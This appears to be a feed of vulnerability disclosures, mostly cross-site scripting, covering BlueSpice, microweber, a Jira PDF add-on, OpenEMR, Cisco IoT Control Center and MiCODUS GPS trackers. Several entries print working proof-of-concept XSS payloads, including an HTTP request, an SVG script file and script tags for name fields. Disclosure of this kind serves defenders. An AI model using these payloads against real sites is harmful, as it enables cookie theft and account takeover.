Cross-site Scripting (XSS) vulnerability in "Extension:ExtendedSearch" of Hallo Welt! GmbH BlueSpice allows attacker to inject arbitrary HTML (XSS) on page "Special:SearchCenter", using the search term in the URL.

Date

2022-01-31

Severity

Medium

Affected

BlueSpice 3.x, BlueSpice 4.x

Fixed in

BlueSpice 3.2.9, BlueSpice 4.1.1

**Problem**

Users are able to inject arbitrary HTML (XSS) on Special:SearchCenter, using the search term. This can be triggered via URL.

**Solution**

Upgrade to BlueSpice 4.1.1

**Acknowledgements**

Special thanks to the security team of an undisclosed customer

CVE-2022-2510: Security:Security Advisories/BSSA-2022-01 - BlueSpice Wiki

Cross-site Scripting (XSS) vulnerability in the "commonuserinterface" component of BlueSpice allows an attacker to inject arbitrary HTML into a page using the title parameter of the call URL.

Date

2022-04-25

Severity

Medium

Affected

BlueSpice 4.x

Fixed in

4.1.3

**Problem**

Users are able to inject arbitrary HTML (XSS) on regular pages, using a special value for the title parameter. This can be triggered via URL.

**Solution**

Upgrade to BlueSpice 4.1.3

**Acknowledgements**

Special thanks to the security team of an undisclosed customer

CVE-2022-2511: Security:Security Advisories/BSSA-2022-02 - BlueSpice Wiki

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.21.

**Description**

Hi team, I found XSS at /module/.

**Proof of Concept**

Pop up POC: 

Reflected POC: 

Full request payload:

    POST /demo/module/ HTTP/1.1
    Host: demo.microweber.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 183
    Origin: https://demo.microweber.org
    Referer: https://demo.microweber.org/demo/shop
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Te: trailers
    Connection: close
    
    type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings
    

**Impact**

XSS

**Occurrences**

index.php L80-L92

This function does not filter 'id' parameter in script tag, which allows attackers to escape syntax using apostrophe.

CVE-2022-2470: Cross-site Scripting (XSS) - Reflected in microweber

The Better PDF Exporter add-on 10.0.0 for Atlassian Jira is prone to stored XSS via a crafted description to the PDF Templates overview page.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2022-038 Product: Better PDF Exporter for Jira Manufacturer: Midori Global Consulting Kft. Affected Version(s): 10.0.0 Tested Version(s): 9.6.0 Vulnerability Type: Stored Cross-Site Scripting (CWE-79) Risk Level: Low Solution Status: Open Manufacturer Notification: 2022-05-27 Solution Date: - Public Disclosure: 2022-07-22 CVE Reference: CVE-2022-36131 Author of Advisory: Lukas Faiß, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Better PDF Exporter is an add-on for Jira to export Jira artifacts to PDF files. The manufacturer describes the product as follows (see \[1\]): "Better PDF Exporter exports Jira issues to PDF documents to share, print, email, archive and report issues in the standard business document file format." Due to insufficient input validation of user-provided input, Better PDF Exporter is vulnerable to cross-site scripting attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The 'PDF Templates' overview is prone to a stored cross-site scripting attack. XSS vulnerabilities allow an attacker to embed malicious JavaScript code into server replies which is later executed in the web browsers of other users. By executing JavaScript, attackers can, for example, perform actions in the context of other logged-in users. For testing purposes, the add-on of the manufacturer\[1\] was used in a local Jira Server\[4\] installation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The 'PDF Template' view in the administration back end can be exploited for an attack. After entering the attack vector "" in the description field of a PDF template, the following request is sent to the server: POST /rest/com.midori.jira.plugin.pdfview/1.0/pdf-resource/30 HTTP/2 Host: \[REDACTED\] Cookie: Content-Length: 153 Sec-Ch-Ua:"Not A;Brand";v="99","Google Chrome";v="101" Accept: \*/\* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Sec-Ch-Ua-Platform: "Linux" Origin: \[REDACTED\] Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: \[REDACTED\]/secure/update-pdf-resource.jspa?id=30 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 name=Pentest.pdf&description=%3cscript%3ealert('SySS\_PXSS\_PoC')%3b%3c %2fscript%3e&content=content By calling the 'PDF Template' overview page through the URL "https://\[REDACTED\]/secure/pdf-resources.jspa", the payload is loaded and executed. The payload is listed in the following response: ... Pentest.pdf

CVE-2022-36131

Cross-site Scripting (XSS) - Stored in GitHub repository microweber/microweber prior to 1.2.21.

**Description**

By uploading SVG files, the users can perform Stored XSS attack.

**Payload**

Copy the following code and save as filename.svg. <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(document.domain)</x:script>

**Proof of Concept**

\[1\] Login as admin.

\[2\] upload the payload injected SVG file at https://demo.microweber.org/demo/admin/view:modules/load_module:files

\[3\] Copy the uploaded svg file url and open in new tab.

\[4\] XSS!

**Impact**

If an attacker can execute the script in the victim's browser via SVG file, they might compromise that user by stealing its cookies.

CVE-2022-2495: Stored XSS via SVG File  in microweber

Cross-site Scripting (XSS) - Stored in GitHub repository openemr/openemr prior to 7.0.0.

**Description**

openemr / openemr is vulnerable to Cross-site Scripting (XSS) - Stored

**Proof of Concept**

    // Poc 
    <script>alert(document.cookie)</script>
    

steps to reproduce:

    1) login open emr patient portal https://demo.openemr.io/openemr/portal/index.php
    
    2) goto my profile in https://demo.openemr.io/openemr/portal/home.php
    
    ​3)click on pending review.
    
    4)add the payload in the first name /middle name  (<script>alert(document.cookie)</script>)
    
    5) click  submit changes
    
    6) after that we get an with Error: Patient was successfully updated
    
    7) on clicking  pending review  the xss wil be triggered
    

**Impact**

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

CVE-2022-2494: Cross-site Scripting (XSS) - Stored in openemr

A vulnerability in the web-based management interface of Cisco IoT Control Center could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.

**

Summary

**

*   A vulnerability in the web-based management interface of Cisco IoT Control Center could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.
    
    This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
    
    Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
    
    This advisory is available at the following link:  
    https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iotcc-xss-WQrCLRVd
    

**

Affected Products

**

*   This vulnerability affects Cisco IoT Control Center, which is cloud based.
    
    Only products listed in the Vulnerable Products section of this advisory are known to be affected by this vulnerability.
    

**

Workarounds

**

*   There are no workarounds that address this vulnerability.
    

**

Fixed Software

**

*   Cisco has addressed this vulnerability in Cisco IoT Control Center, which is cloud based. No user action is required.
    
    Customers who need additional information are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    

**

Exploitation and Public Announcements

**

*   The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.
    

**

Source

**

*   Cisco would like to thank Ahmad Ali Almegbas for reporting this vulnerability.
    

**

Cisco Security Vulnerability Policy

**

*   To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.
    

**

Related to This Advisory

**

**

URL

**

**

Revision History

**

*   Version
    
    Description
    
    Section
    
    Status
    
    Date
    
    1.0
    
    Initial public release.
    
    \-
    
    Final
    
    2022-JUL-20
    
    Show Less
    

**

Legal Disclaimer

**

*   THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.
    
    A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.
    

**

Feedback

**

CVE-2022-20916: Cisco Security Advisory: Cisco IoT Control Center Cross-Site Scripting Vulnerability

By Deeba Ahmed
The MV720 GPS tracker is manufactured by a China-based company MiCODUS which was informed about the flaws back…
This is a post from HackRead.com Read the original post: Critical Vulnerability in Popular GPS Tracker Lets Hackers Remotely Control Vehicles

****The MV720 GPS tracker is manufactured by a China-based company MiCODUS which was informed about the flaws back in September 2021 yet it has not fixed the issue.****

Cybersecurity startup BitSight has identified six flaws in the GPS tracker MV720 manufactured by China-based MiCODUS. According to the IT security researchers at BitSight the critical security vulnerabilities were present in MV720 GPS trackers, used primarily for tracking vehicle fleets. The vulnerabilities can allow hackers to track, stop, and control vehicles remotely.

For your information, MV720 is a hardwired GPS tracker worth around $20. The Shenzhen-based MiCODUS electronics maker claims that 1.5 million of its GPS trackers are currently in use by over 420,000 customers across 169 countries.

Furthermore, its clients include several Fortune 50 companies, shipping, aerospace, government, military, critical infrastructure, law enforcement agencies, and a nuclear power plant operator.

**Vulnerabilities Details**

BitSight has detected six severe vulnerabilities in the abovementioned tracker, which can be easily exploited remotely to track a vehicle in real-time, get information about previous routes, and even cut the vehicles’ engines when in motion.

BitSight’s principal security researcher and report author, Pedro Umbelino, explained that the vulnerabilities’ easy exploitation raises “significant questions” about the company’s products as the bugs may not be restricted to one GPS tracker model. He believes the same flaws are present in other tracker models.

MV720 GPS tracker

**Dangers Posed by the Flaws**

According to BitSight’s blog post, one flaw in MV720 is in unencrypted HTTP communications, allowing hackers to remotely conduct adversary-in-the-middle attacks (AiTM) to intercept/change the requests exchanged between the servers and the mobile application.

Another flaw is found in the tracker’s authentication mechanism in the mobile app, which lets attackers access the hardcoded key to lock down the trackers and use a custom IP address. This enables hackers to monitor and control communications to and from the device.

The vulnerability tracked as CVE-2022-2107 is assigned a severity rating of 9.8 out of 10. It is a hardcoded password that MiCODUS trackers use as a master password. If obtained by hackers, they can use this passcode to log into the web server and pose as an authentic user to send commands to the tracker via SMS communications.

Hence, they can fully control any GPS tracker, access location details, disarm the alarm, change routes and geofences, and cut off vehicles’ fuel.

Another vulnerability tracked as CVE-2022-2141 enables a broken authentication state in the protocol used by the tracker to communicate with the MiCODUS server. Then there’s a reflected cross-site scripting error identified in the Web server. Tracking designations of other vulnerabilities are CVE-2022-2199, CVE-2022-34150, and CVE-2022-33944.

In its technical write-up , BitSight warned MiCODUS in September 2021 about the flaws. However, after the company’s lukewarm response, CISA and BitSight decided to make the findings public. The vulnerabilities are still unpatched. BitSight recommends that all organizations and individuals using MV720 GPS trackers immediately disable the devices until they are patched.

> Organizations and individuals using MV720 devices in their vehicles are at risk. Leveraging our proprietary data sets, BitSight discovered MiCODUS devices used in 169 countries by organizations including government agencies, military, and law enforcement, as well as businesses spanning a variety of sectors and industries including aerospace, energy, engineering, manufacturing, shipping, and more. Given the impact and severity of the vulnerabilities found, it is highly recommended that users immediately stop using or disable any MiCODUS MV720 GPS trackers until a fix is made available.
> 
> BitSight

1.  Woman Follows GPS, Goes Straight into Lake
2.  600,000 GPS child trackers found vulnerable to location tracking
3.  Security Flaws in GPS Trackers Puts Millions of Devices’ Data at Risk
4.  Shoddy security of smartwatch lets hackers access your child’s location
5.  Strava’s Global Heat Map Exposes User Locations Including Military Bases

Critical Vulnerability in Popular GPS Tracker Lets Hackers Remotely Control Vehicles

The Monroe Electronics / Digital Alert Systems OneNet SE DASDEC Emergency Alert System Appliance suffers from cross site scripting and html injection vulnerabilities.

DASDEC Cross Site Scripting / HTML Injection

Authenticated (custom plugin role) Arbitrary File Read via Export function vulnerability in GiveWP's GiveWP plugin <= 2.20.2 at WordPress.

Tag

#xss